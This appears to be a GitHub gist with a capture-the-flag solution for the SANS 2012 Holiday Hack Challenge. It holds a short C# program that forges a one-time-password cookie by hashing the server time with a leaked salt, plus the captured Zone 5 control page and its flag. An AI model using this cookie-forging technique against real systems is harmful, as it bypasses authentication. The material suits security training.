-
-
Save 5342/9e046fdfff6c2bc80bea to your computer and use it in GitHub Desktop.
Quick hack to demonstrate automation for access to http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/
as part of http://pen-testing.sans.org/holiday-challenge/2012
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Password: 27ada72545d0fc5ce31785ea874c5adf5b0bbf9f | |
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" | |
| "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
| <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> | |
| <head> | |
| <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> | |
| <meta http-equiv="Content-Language" content="en-us" /> | |
| <title>Snow Miser SnowTalk HMI for the Global Chiller Control System - Zone 5 - North Pole</title> | |
| <meta name="keywords" content="" /> | |
| <meta name="description" content="" /> | |
| <meta name="copyright" content="" /> | |
| <link type="text/css" href="/css/reset.css" rel="stylesheet" media="screen" /> | |
| <link type="text/css" href="/css/style.css" rel="stylesheet" media="screen" /> | |
| </head> | |
| <body> | |
| <div id="container"> | |
| <div id="header"><div id="title"> | |
| <a href='/'><img src="/images/logo.png" alt="" width="250" height="100" /></a> | |
| </div> | |
| </div> | |
| <div id="sidebar"> | |
| <div class="sidebox"> | |
| <span class="stitle">Navigation</span> | |
| <div id="navigation"> | |
| <div class="sidenav"> | |
| <div class="navhead_blank"> | |
| <span><a href="/" class="menu">Home</a></span> | |
| </div> | |
| <div class="navhead"> | |
| <span>Zone</span> | |
| </div> | |
| <div class="subnav"> | |
| <ul class="submenu"> | |
| <li><a href="/zone-0-11698563-7582-4A51-B567-B4710BBE783F/" class="menu">Readonly</a></li> | |
| <li><a href='/zone-1-D2E31380-50E6-4869-8A85-F9CDB3AF6226/' class="menu">Zone 1</a></li> | |
| <li><a href='/zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3/' class="menu">Zone 2</a></li> | |
| <li><a href='/zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962/' class="menu">Zone 3</a></li> | |
| <li><a href='/zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33/' class="menu">Zone 4</a></li> | |
| <li><a href='/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/' class="menu">Zone 5 - North Pole</a></li> | |
| </ul> | |
| <a href='http://www.counterhackchallenges.com' target='_blank'><img src='/images/chclogo-vert-snow.png' alt='Counter Hack Challenges | |
| , LLC.' /></a> | |
| </div> | |
| </div> | |
| </div> | |
| </div> | |
| </div> | |
| <div id="main"> | |
| <div id="content"> | |
| <h2>Snow Miser SnowTalk HMI for the Global Chiller Control System</h2> | |
| <h1>Zone 5 Controller</h1> | |
| <h3><p>Current Access Level - <strong>Five</strong></p></h3> <table> | |
| <tr> | |
| <td><h3>Chiller for Zone 5:</h3></td> | |
| <td><form method="get"><input type="submit" name="machine" id="machine" value="Enable" class="navhead" /></form></td> | |
| <td><form method="get"><input type="submit" name="machine" id="machine" value="Disable" class="navhead" /></form></td> | |
| <!-- If you are looking for some super secret code or database that stores your game state, good luck, it doesn't exist --> | |
| <td width="55%"></td> | |
| </tr> | |
| <tr> | |
| <td colspan="4"> | |
| <img src="on.png" /> | |
| </td> | |
| </tr> | |
| </table> | |
| <!-- The flag for this level is 3ab1c5fa327343721bc798f116be8dc6 --> | |
| </div> | |
| </div> | |
| </body> | |
| </html> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Security.Cryptography; | |
| using System.Text; | |
| using System.Text.RegularExpressions; | |
| namespace SnowStorm | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| HttpWebRequest webRequest = (HttpWebRequest)WebRequest.Create("http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/"); | |
| webRequest.UserAgent = "SnowStorm"; | |
| var webResponse = webRequest.GetResponse().GetResponseStream(); | |
| StreamReader streamReader = new StreamReader(webResponse); | |
| string text = streamReader.ReadToEnd(); | |
| Regex r = new Regex("<!-- current server time is (?<data>.+?) -->"); | |
| Match match = r.Match(text); | |
| string serverTime = match.Groups["data"].Value; | |
| string salt = " 7998f77a7dc74f182a76219d7ee58db38be3841c"; | |
| SHA1 sha1 = new SHA1Managed(); | |
| byte[] hash = sha1.ComputeHash(Encoding.ASCII.GetBytes(serverTime + salt)); | |
| string password = BitConverter.ToString(hash).Replace("-","").ToLower(); | |
| Console.WriteLine("Password: {0}\r\n", password); | |
| webRequest = (HttpWebRequest)WebRequest.Create("http://snowmiser.counterhack.com/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE/"); | |
| webRequest.UserAgent = "SnowStorm"; | |
| webRequest.CookieContainer = new CookieContainer(); | |
| webRequest.CookieContainer.Add(new Cookie("otp", password, "/zone-5-89DE9B26-CF7D-4B07-88DE-7A2F0A7B16FE", "snowmiser.counterhack.com")); | |
| webResponse = webRequest.GetResponse().GetResponseStream(); | |
| streamReader = new StreamReader(webResponse); | |
| text = streamReader.ReadToEnd(); | |
| Console.WriteLine(text); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment